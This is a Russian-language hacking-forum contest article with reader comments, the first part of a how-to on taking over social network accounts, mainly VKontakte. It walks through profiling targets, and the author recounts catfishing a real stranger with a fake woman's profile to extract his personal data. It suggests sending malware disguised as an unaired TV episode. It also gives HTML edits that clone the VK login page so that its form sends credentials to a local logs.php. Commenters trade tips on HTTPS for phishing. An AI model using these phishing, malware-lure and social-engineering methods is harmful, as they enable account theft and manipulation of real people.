Конкурс Получение доступа к аккаунту социальной сети. Ч 1

al04e

al04e

Cyberpunk
Премиум
24.05.2017
293
1 315
Статья для участия в конкурсе на codeby.

Приветствую вас дорогие друзья!
Сегодня мы поговорим о получении доступа к аккаунту из какой-либо социальной сети. Я постараюсь описать все способы. Также мы испытаем их на практике.

То, что сегодня опишу в данной статье - уголовно наказуемо
. Поэтому я заранее подготовил несколько аккаунтов для получения к ним доступа. Больше всего внимания в этой статье я уделю социальной инженерии, так как практически все способы построены на ней.

Основные способы взлома.

К таким способам относятся:
  • Фишинг
  • Подбор пароля(Brute force)
  • MITM (Man In The Middle)
  • Используя малварь
Фишинг - способ основанный на клонировании страницы авторизации какой-либо социальной сети.
Brute Force - подбор пароля с использованием различных баз.
Этот способ не всегда эффективен но последнее время часто используем.
Используя малварь. К примеру кейлоггер. Он записывает все введенное с клавиатуры и отправляет злоумышленнику.
Шаг 1. - Сбор информации.

Всегда перед взломом(не обязательно аккаунта) нужно собрать как можно больше информации. Для начала нужно обратить внимание на страницу пользователя. В качестве примера возьмем социальную сеть Вконтакте. Обратите внимание на посты закрепленные на странице у пользователя, на его статус. Также попробуйте разобраться какую музыку любит пользователь, обратите внимание на фотографии пользователя. Из всего этого можно взять много информации. Теперь обратим наш взор на контактную информацию. Советую записывать найденные вами данные. Чаще всего номер либо не указывают, либо пишут не верный. Город тоже важная деталь.

Теперь перейдем к взаимодействию с пользователем. Вот тут мы отработаем наши навыки в социальной инженерии. Создаем страницу в этой социальной сети(в нашем случае вконтакте). Я создал страницу молодой девушки и добавил на страницу много различных фотографий. Раскрутил страницу для меньшей опасности раскрытия. И писал первым попадающимся мне на глаза дабы потренировать свою социальную инженерию.
Вот что из этого вышло:

BMImePN.jpeg VaBCgNf.jpeg
QqP7c7D.jpeg

Мы вошли в доверие человека спустя много дней общения(я не стал проводить над ним эксперименты и дальше так как он и вправду поверил что я девушка). Исходя из переписки я получил много различной информации в числе которой был номер телефона, род деятельности, год рождения и.т.п. Будьте осторожны в социальных сетях. А на этом первый шаг закончен.

Шаг 2. - Выбор способа.

Здесь все зависит от того как вы вошли в доверие. И еще, не важно какой способ вы выберете первым. Если не сработает один способ можно попробовать другой. Повторяюсь, все зависит от того как вы вошли в доверие.

Представим что я узнал только то, что человек любит смотреть сериал Сверхестественное. В этом случае я могу первым выбрать фишинг или отослать ему малварь. Под предлогом "Смотри! Серия которой еще нет в эфире". Человек скачивает , открывает(правда придется помучится с форматами файла и обходом av) думает что все нормально. Но при следующем его заходе в социальную сеть данные отправляются нам.

Если же вы плохо вошли в доверие, но сумели собрать достаточно информации, то можно изначально подобрать пароль. Основываясь на полученной информации можно составить много паролей. Правда перед этим советую поискать по базам со стандартными(часто используемыми) паролями.

Шаг 3. - Осуществление способа.

Фишинг.

Это способ является самым популярным. Но я внес некоторые свои изменения и упрощения. Давайте создадим фишинговый сайт по подобию все того же вконтакте. В добавок хотел бы сказать что фишинг уже не является эффективным способом. Но для общего понимания мы его разберем.

1. Переходим на страницу авторизации --> пкм --> сохранить как --> test_fish.
Получили папку и один файл

gSfA.jpeg


2. Теперь при помощи текстового редактора откроем файл test_fish.
Первым же делом ищем
HTML:
<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login" target="quick_login_frame">
И меняем его на
HTML:
<form method="POST" name="login" id="quick_login_form" action="./logs.php" target="quick_login_frame">
Теперь ищем строку 215 - 219( js код)
Над ней пишем
Код:
<!--
Далее ищем строку закрывающую тело тега script.
И после этой строки снова пишем
Код:
-->

Тем самым мы закомментировали js код который нам не пригодится и может вызвать торможение в работе. Осталось сохранить этот файл.

На сегодня пожалуй закончим. До встречи в части 2.
 
Последнее редактирование:
V

Valkiria

В третьем шаге ты описываешь, как создать фейковую страницу авторизации ВК ?
 
kot-gor

kot-gor

Grey Team
07.09.2016
524
685
фишинговая атака не всегда пройдет, некоторые браузеры попросту отказывают загружать страницу если она не https.
 
al04e

al04e

Cyberpunk
Премиум
24.05.2017
293
1 315
фишинговая атака не всегда пройдет, некоторые браузеры попросту отказывают загружать страницу если она не https.
я буду описывать все способы. И да, фишинг стал уже не эффективен. Но для общего понимания все же начал его описывать.
[doublepost=1509554933,1509554880][/doublepost]
В третьем шаге ты описываешь, как создать фейковую страницу авторизации ВК ?
Шаг 3 - это шаг осуществления атаки. Я начал описывать фишинг, но еще не закончил.
 
kot-gor

kot-gor

Grey Team
07.09.2016
524
685
получить то можно, только тогда уже нужно регистрировать доменное имя.
 
R

Russian_Bird

Member
29.10.2017
15
10
получить то можно, только тогда уже нужно регистрировать доменное имя.
А ты собирался использовать спец сервисы ? Я тебя огорчю, все эти сервисы как раз то и не открываются. Если хочешь делать фишинг, то покупай свой веб сервер, ставь скрипт и делай ssl.
 
Последнее редактирование модератором:
kot-gor

kot-gor

Grey Team
07.09.2016
524
685
Не сервис не спец сервис я не собираюсь использовать...и вы меня не огорчите, я достаточно в этом разбираюсь...Мне просто очень интересен ваш алгоритм действия с сертификатом для фишинга..поведали бы народу .думаю многим было бы интересно...
 
D

Dmitry88

что фишинг уже не является эффективным способом.
Просто оставлю это здесь...


СИ всегда будет эфективна. То что усложняется техническая защита пользователей от типичных СИ трюков, не значит, что СИ стала не ефективна. Если бы фишинг не был бы эфективным, то и эпидемий рансомвари не было бы.

ПС: За оформление плюс, за содержание пока 0. Ждем вторую часть ;)
 
G

gudvin33

Active member
30.10.2017
25
4
я буду описывать все способы. И да, фишинг стал уже не эффективен. Но для общего понимания все же начал его описывать.
[doublepost=1509554933,1509554880][/doublepost]
Шаг 3 - это шаг осуществления атаки. Я начал описывать фишинг, но еще не закончил.
Скажите пожалуйста почему сейчас фишинг не эффективен ? просто я новичок в этой теме и хотел бы услышать ответ от знающего человека
 
  • Нравится
Реакции: CyberX88
al04e

al04e

Cyberpunk
Премиум
24.05.2017
293
1 315
Скажите пожалуйста почему сейчас фишинг не эффективен ? просто я новичок в этой теме и хотел бы услышать ответ от знающего человека
Фишинг не особо эффективен в получении доступа к аккаунтам социальных сетей потому что все больше людей строят из себя уненьких "мол я по ссылкам не перехожу". Но если у тебя с СИ все прекрасно, то для тебя фишинг эффективен:)
 
  • Нравится
Реакции: nikos и CyberX88
Artem.ser

Artem.ser

Active member
04.11.2017
35
6
Пока по оформлению хорошо, по содержанию маловато
Переходим ко второй части, может там исправлена ситуация
 
FlowLight

FlowLight

Премиум
31.07.2017
28
27
Доброго врмени, автор. Прошу помощи! Не могу найти строку из 2 пункта.Можешь скрин с располодением кинуть?
 
Artem.ser

Artem.ser

Active member
04.11.2017
35
6
Доброго врмени, автор. Прошу помощи! Не могу найти строку из 2 пункта.Можешь скрин с располодением кинуть?
Он вроде в том же месте, куда ты его сохранил при копипасте страницы, если ты про это, ну и через поиск по названию в файловом менеджере
 
S

Sniff

СИ, наше всё. В некоторых случаях, без неё никак не обойтись.
 
Мы в соцсетях: